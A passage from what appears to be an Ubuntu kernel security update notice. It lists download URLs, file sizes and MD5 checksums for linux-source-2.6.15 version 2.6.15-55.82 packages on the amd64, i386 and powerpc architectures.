http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb\n      Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb\n      Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb\n      Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb\n      Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb\n      Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   202666 71d8be83541874d6c675945838b9e223\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    49294 e4a805200acaaea274e67995602294e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    35158 0869bee234a54b1afe362123606efe66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    33806 ebf707126fa6326899d648786afa8779\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:    38938 75eb074224a6373013e621cdd5931a51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb\n      Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb\n      Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb\n      Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb\n      Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb\n      Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb\n      Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb\n      Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53554 afc415fd0a28c363579986fc48464671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    98468 ddb974591a687460f50c26a2e2682593\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   299158 458051a07217501718f6e2a742bec0a3\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    51536 d2c7a02ac033097208c359312e95d246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2482 3c964c577c93d80cee55d06e78003951\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40906 84f84dc75718a347eb6623204cab6209\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29892 4a807f384985ae3376d509474716f13a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45054 a2373aac90339698b2cba11e43978565\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     1934 0887612df6acbc867949c33251427c00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2198 d38a4ec22579275ff2f48805be734356\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   161908 70564b18529d383509cb4c1d4898425a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872596 8602056ab95806f02667587737cb3b59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb\n      Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17386 1abc2376b554610aec23e87f60998358\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5\n    